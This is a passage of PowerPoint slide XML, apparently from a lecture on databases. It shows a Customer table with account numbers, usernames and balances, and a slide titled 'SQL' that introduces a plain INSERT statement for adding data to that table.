                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="560306">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>0501</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>bgates</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="63500" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>79.2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="70111" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="934232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>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00989382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32CE1D-6A1B-0349-8823-453EC78E8714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AD2869-185D-A946-8004-3567C3FE5184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8991600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add/modify data to the table                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO Customer VALUES (8477, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>', 10.00)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68ECA14E-746B-0A49-B599-38CA1205C333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4220574284"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="938213" y="2723700"/>
          <a:ext cx="5538787" cy="2834940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1533619">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2103434">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1901734">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="397450">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="27940" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="185"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" i="0" kern="1200" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Customer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="25400" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>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000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="397450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AcctNum</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="25400" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="25400" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Balance</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="25400" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="418046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1199</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="45085" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>zuckerberg</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="45085" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="62865" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>35.7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="45085" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="407470">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>0501</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="39369" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
